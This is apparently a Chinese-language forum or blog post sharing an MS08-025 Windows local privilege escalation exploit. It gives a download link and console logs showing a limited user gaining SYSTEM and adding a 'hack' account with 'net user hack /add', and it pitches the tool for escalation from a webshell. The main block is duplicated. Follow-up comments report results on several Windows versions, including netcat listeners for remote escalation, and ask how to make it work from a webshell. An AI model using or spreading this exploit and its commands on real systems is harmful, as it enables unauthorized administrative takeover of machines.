Win2k CN SP2 ,Win2k3 CN SP1下測試通過,其它未測試(不裝XP那種垃圾)
D:\>whoami
BAICKER-VMWARE\009
D:\>net user hack /add
系統發生 5 錯誤。
拒絕訪問。
D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode...
NT AUTHORITY\SYSTEM
D:\>ms08025 "net user hack /add"
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode...
D:\>命令成功完成。
D:\>net user
\\BAICKER-VMWARE 的用戶帳戶
-------------------------------------------------------------------------------
009 Administrator Guest
hack IUSR_BAICKER-VMWARE IWAM_BAICKER-VMWARE
TsInternetUser
命令成功完成。
D:\>
webshell下提權

http://www.aygfsteel.com/Files/baicker/ms08025.rar
D:\>whoami
BAICKER-VMWARE\009
D:\>net user hack /add
系統發生 5 錯誤。
拒絕訪問。
D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode...
NT AUTHORITY\SYSTEM
D:\>ms08025 "net user hack /add"
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode...
D:\>命令成功完成。
D:\>net user
\\BAICKER-VMWARE 的用戶帳戶
-------------------------------------------------------------------------------
009 Administrator Guest
hack IUSR_BAICKER-VMWARE IWAM_BAICKER-VMWARE
TsInternetUser
命令成功完成。
D:\>
webshell下提權

http://www.aygfsteel.com/Files/baicker/ms08025.rar
有良心的HIPS都封了
系統分析是win2000 sp4,win2003 sp0,win2003 sp2
win2003 sp0 => 直接藍屏了(就不用說后面的情況了)
win2003 sp2 =>本地建賬號(默認是users權限)測試成功(本地runas測試)
win2003 sp2 =>本地建賬號用RUNAS運行NC監聽,遠程連接提權也成功
win2003 sp2=>webshell下用NC監聽,遠程連接提權失敗
win2000 sp4的情況和win2003 sp2的情況一樣(這里就不細說了)
由于沒有裝win2003 sp1沒有測試
我想問的是為什么在直接建的賬號的情況下可以提權成功,而webshell失敗
難道是權限問題(本地建的用戶權限是users,WEBSHELL的權限是network)
希望baicker能說明一下原因,如何可以成功利用他來提權(WEBSHELL)先謝了
還有就是能不能看一下這個程序的源代碼
好像沒有說的那么神吧?